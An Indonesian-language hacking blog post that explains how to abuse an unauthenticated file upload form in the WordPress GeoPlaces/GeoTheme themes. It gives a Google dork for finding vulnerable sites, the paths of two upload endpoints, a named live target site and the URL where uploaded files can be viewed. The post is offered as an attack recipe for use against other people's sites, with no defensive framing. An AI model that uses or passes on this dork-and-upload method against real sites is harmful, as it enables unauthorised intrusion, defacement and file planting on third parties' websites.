Wordpress Geo Theme File Upload Vulnerability






Nah kali ini saya berbagi teknik baru nih :3 hehe
Ya lumayan lah buat tambahan ilmu gituh :3 / haha
Sebelumnya ucapkan Greetz to Mr. Xenopobic atas pencerahannya

Sytemnya sangat mirip dengan easy comment yang dulu saya pernah share,,
Oke langsung saja deh cekibrot >>
Pertama seperti biasa kita ngandelin Mbah Google
Masukin Dork
#Dork : “inurl:wp-content/themes/GeoPlaces/”
Exploit 1 : wp-content/themes/GeoPlaces/monetize/upload
Exploir 2 :/wp-content/themes/GeoTheme/library/comment-uploads/upload-form.php (recomendasi)

Nah klik aja yang mana aja deh :-D hehe ,,
Kalau vuln bakal ada penampakan seperti ini gan :


Live Target : cy4you.info/wp-content/themes/GeoTheme/library/comment-uploads/upload-form.php

Nah untuk melihat hasilnya :
situs.anu/wp-content/uploads/2014/09/filekamu

Contoh : http://cy4you.info/wp-content/uploads/2014/09/pelurukertas.jpg

Ekstensi suport : file image (jpg , gif , png) dll.

Nah cukup mengerti bukan ,, dan cukup mudah . ^_^
Sekian dari saya terimakasih ,, semoga bermanfaat ^_^

Catatan : jangan sepelekan ilmu , karena sekecil apapun itu gunakanlah untuk hal besar.

Terimakasih telah berkunjung diblog kami , silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^
Subscribe To Get Best Articles!

Jika menurut kalian artikel di blog ini berkualitas dan bermanfaat, silahkan berlangganan artikel terbaru melalui pesan masuk email anda secara gratis.

2 comments:

" Terimakasih telah mengunjungi blog kami ,, silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^ "